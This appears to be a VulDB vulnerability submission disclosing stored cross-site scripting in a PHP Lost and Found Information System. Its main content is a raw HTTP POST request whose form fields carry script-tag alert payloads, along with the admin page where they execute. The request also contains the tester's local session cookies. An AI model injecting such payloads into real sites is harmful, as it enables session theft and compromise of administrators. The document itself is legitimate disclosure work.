Submit #155183: Stored XSS in Lost and Found Information System 1.0 View message send from contact forminfo

TitleStored XSS in Lost and Found Information System 1.0 View message send from contact form
DescriptionDetail: Stored XSS in Lost and Found Information System 1.0 in admin View message send from contact form Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html Production: Lost and Found Information System Version: 1.0 Request: POST /php-lfis/classes/Master.php?f=save_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3651031312771010866996354889 Content-Length: 839 Origin: http://localhost Connection: close Referer: http://localhost/php-lfis/?page=contact Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="id" -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="visitor" -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="fullname" Tuan"><script>alert('1')</script> -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="email" [email protected] -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="contact" Tuan"><script>alert('2')</script> -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="message" Tuan"><script>alert('3')</script> -----------------------------3651031312771010866996354889-- View effect: /php-lfis/admin/?page=inquiries/view_inquiry&id=2
Source⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
User
 huutuanbg97 (UID 45015)
Submission05/11/2023 15:33 (3 years ago)
Moderation05/12/2023 08:01 (16 hours later)
StatusAccepted
VulDB entry228887 [SourceCodester Lost and Found Information System 1.0 Contact Form Master.php?f=save_inquiry fullname/contact/message cross site scripting]
Points20

PreviousOverviewNext

Do you know our Splunk app?

Download it now for free!